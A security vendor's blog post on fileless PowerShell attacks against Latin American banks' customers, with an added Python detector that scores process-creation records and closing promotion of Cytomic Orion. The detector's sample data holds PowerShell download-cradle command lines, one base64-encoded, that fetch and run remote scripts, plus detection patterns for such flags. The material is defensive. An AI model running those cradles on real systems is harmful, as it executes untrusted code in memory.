Financial institutions in several Latin American countries are concerned about their cybersecurity. And not without reason: many of their customers are falling victim to cyberattacks that aim to steal their credentials. And, more worrying still, these attacks are carried out without any malicious file being written to disk. To do this, cybercriminals use a sophisticated attack model with several phases:
1.- Intrusion. A script on the victim's machine connects to a URL to download PowerShell scripts, and renames the dropped files so that they look like entirely legitimate operating system files. PowerShell is a legitimate Windows administration and scripting tool; attackers abuse it because it can fetch and run code directly in memory, and it is frequently used to dump credentials.
2.- Deception. The malware then forces the affected computer to restart and shows a fake lock screen. Whatever the user types into it goes to the attackers, which is how they obtain the access credentials.
3.- Spread. In the next step, the attacker uses tools already present on the victim's computer to harvest email addresses and to gain administrator privileges.
4.- Blocking. Once signed in with those privileges, the malware downloads further intrusion tools that take over the device, then reads the user's browser history in order to identify and steal the victim's banking credentials and pass them on.
These banks are not the first to fall prey to similar problems. In 2017, over 100 banks and other enterprises worldwide were found to be infected with in-memory malware whose techniques resembled those of the earlier Duqu 2.0. It was similar in that it was not written to disk as files, but lived in the RAM of the victim computers. Once more, the aim was to get hold of system administrator credentials, use them to reach the financial institutions' servers and, from there, carry out the attackers' actions without being discovered.
Financial institutions are one of the worst-hit sectors when it comes to this kind of trend. According to an Accenture report, 42% of cyberattacks on financial entities remain hidden for around one week before being detected. Worse still, IMF estimates suggest that losses from this kind of cyberattack are between 10% and 30% of annual net turnover.
The key: attack without being discovered_
Any kind of attack is a problem for an organization's corporate cybersecurity. However, this kind of case poses an additional challenge: traditional, file-based cybersecurity solutions are unable to detect these attacks.
There are two factors that have a hand in this. Firstly, because nothing malicious is written to disk, signature- and file-based scanners have no object to locate and classify as a threat, so the attack's actions remain invisible to them. Secondly, the intrusion is carried out with entirely legitimate system tools such as PowerShell, whose execution a traditional threat analysis has no reason to flag.
This is the main problem with Living-off-the-Land (LotL) attacks: the indicators that many cybersecurity solutions rely on (a link to a malicious file, or the use of an illegitimate tool) are absent, and as a result the cybercriminals can act without being detected. There are even cases in which the infection stays active for months on end before the final blow reveals its presence.
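The practical answer to this gap is to look at how the legitimate tools are used rather than at files. As an added example (not code from the original page or from Cytomic), the Python below scores Windows process-creation records of the kind an endpoint agent or SIEM already collects (parent image, image path, command line) for the traits of the chain described above: a scripting host launching PowerShell with a download cradle, hidden-window and policy-bypass flags, an encoded command whose UTF-16LE base64 payload is decoded and inspected, and a dropped binary that reuses a system file name outside the Windows directories. The five sample records, the 203.0.113.10 address, the trusted-directory list, the weights and the threshold are all constructed or assumed for illustration. The first record also shows why a single legitimate-tool indicator (an administrator's -NoProfile) must not be enough on its own.

```python
"""Score Windows process-creation records for Living-off-the-Land PowerShell
traits. Added example; records, addresses, weights and threshold are
constructed for illustration and are not real telemetry or a product's rules."""
import base64
import ntpath
import re

# Directories from which the well-known Windows binaries legitimately run
# (assumed list; a real deployment would derive it from a golden image).
TRUSTED_DIRS = {
    r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64",
    r"c:\windows\system32\windowspowershell\v1.0",
    r"c:\windows\syswow64\windowspowershell\v1.0",
}
# System file names an attacker is likely to reuse for a dropped binary.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                "services.exe", "explorer.exe", "powershell.exe", "cmd.exe"}
# Scripting hosts that, when they launch PowerShell, suggest a staged script.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                       r"start-bitstransfer|net\.webclient", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)
STEALTH_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|"
                        r"-noni(?:nteractive)?\b|(?:-ep|-exec|-executionpolicy)\s+bypass", re.I)
# -EncodedCommand (and its short forms) takes base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

WEIGHTS = {"masquerade": 3, "download-cradle": 3, "encoded-command": 2,
           "in-memory-exec": 2, "stealth-flags": 1, "scripted-launch": 1}
THRESHOLD = 3  # assumed: one strong trait, or several weak ones, flags a record


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(parent, image, cmdline):
    """Return the list of LotL traits present in one (parent, image, cmdline) record."""
    findings = []
    name = ntpath.basename(image).lower()
    if name in SYSTEM_NAMES and ntpath.dirname(image).lower() not in TRUSTED_DIRS:
        findings.append("masquerade")          # system file name, untrusted location
    if name == "powershell.exe" and ntpath.basename(parent).lower() in SCRIPT_HOSTS:
        findings.append("scripted-launch")
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded-command")
        text += " " + decoded                  # inspect the payload, not just the wrapper
    if STEALTH_RE.search(text):
        findings.append("stealth-flags")
    if CRADLE_RE.search(text) and URL_RE.search(text):
        findings.append("download-cradle")     # fetches more code from a URL
    if EXEC_RE.search(text):
        findings.append("in-memory-exec")      # runs fetched text without touching disk
    return findings


def score(findings):
    return sum(WEIGHTS[f] for f in findings)


def scan(events):
    """Return [(index, score, findings)] for records at or above THRESHOLD."""
    hits = []
    for i, record in enumerate(events):
        findings = analyze_event(*record)
        s = score(findings)
        if s >= THRESHOLD:
            hits.append((i, s, findings))
    return hits


def _encoded(ps):
    """Build a valid -EncodedCommand argument for the constructed sample below."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records (parent image, image, command line); 203.0.113.10
# is a documentation address, not a real server.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", PS,
     r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"),            # admin, benign
    (r"C:\Windows\System32\cmd.exe", PS,
     "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://203.0.113.10/update.ps1')\""),                   # download cradle
    (r"C:\Windows\System32\cmd.exe", PS,
     "powershell.exe -w hidden -enc " + _encoded(
         "IEX ((New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1'))")),
    (r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\svchost.exe",
     "svchost.exe -k netsvcs"),                                                # renamed dropper
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs"),                                                # real svchost
]

if __name__ == "__main__":
    for i, s, findings in scan(SAMPLE_EVENTS):
        print(f"record {i}: score {s} {findings}")
```

Run stand-alone, it flags records 1, 2 and 3 and leaves the administrator's PowerShell session and the genuine svchost.exe alone. The weighting is the important design choice: every individual trait here is something a legitimate tool can do, so the detector reasons about the combination and the decoded payload instead of looking for a file to match.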
The consequences for a bank_
Any company that comes under attack from fileless malware is susceptible to dire consequences. It may be banks, though, that are the most vulnerable victims, given that the range of problems and the financial ramifications are far greater than for other kinds of company.
To begin with, when a cyberattack like this targets a bank's customers, it can lead not just to credential theft, but also to fraud and the theft of money, all of which is a logistical and reputational nightmare for the company. And if the attack targets the bank itself, the outcome is even worse. The entity could lose business, as well as funds, credentials, control of its IT systems, and even the organization's confidential information.
How to avoid these cyberattacks_
To prevent fileless malware attacks and the damage they can cause, we created Cytomic Orion, our Threat Hunting and Incident Response solution. Cytomic Orion addresses Living-off-the-Land techniques through the managed Zero-Trust App Service: applications that try to run on endpoints are treated with a Zero-Trust approach, blocked, and not allowed to run until they have been fully validated. This way, in-memory malware such as Duqu 2.0 can be detected and neutralized.
These days, cyberattacks no longer need infected email attachments or other such traditional vectors. The way to protect the system is therefore to monitor its internal workings, define which behaviors count as dangerous, and eliminate any threat as early as possible.